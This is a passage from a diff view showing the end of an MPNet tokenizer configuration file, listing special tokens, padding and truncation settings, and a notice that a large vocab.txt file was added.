+ "normalized": false,
47
+ "rstrip": false,
48
+ "single_word": false,
49
+ "special": true
50
+ }
51
+ },
52
+ "bos_token": "<s>",
53
+ "clean_up_tokenization_spaces": false,
54
+ "cls_token": "<s>",
55
+ "do_lower_case": true,
56
+ "eos_token": "</s>",
57
+ "extra_special_tokens": {},
58
+ "mask_token": "<mask>",
59
+ "max_length": 128,
60
+ "model_max_length": 384,
61
+ "pad_to_multiple_of": null,
62
+ "pad_token": "<pad>",
63
+ "pad_token_type_id": 0,
64
+ "padding_side": "right",
65
+ "sep_token": "</s>",
66
+ "stride": 0,
67
+ "strip_accents": null,
68
+ "tokenize_chinese_chars": true,
69
+ "tokenizer_class": "MPNetTokenizer",
70
+ "truncation_side": "right",
71
+ "truncation_strategy": "longest_first",
72
+ "unk_token": "[UNK]"
73
+ }
vocab.txt ADDED
The diff for this file is too large to render. See raw diff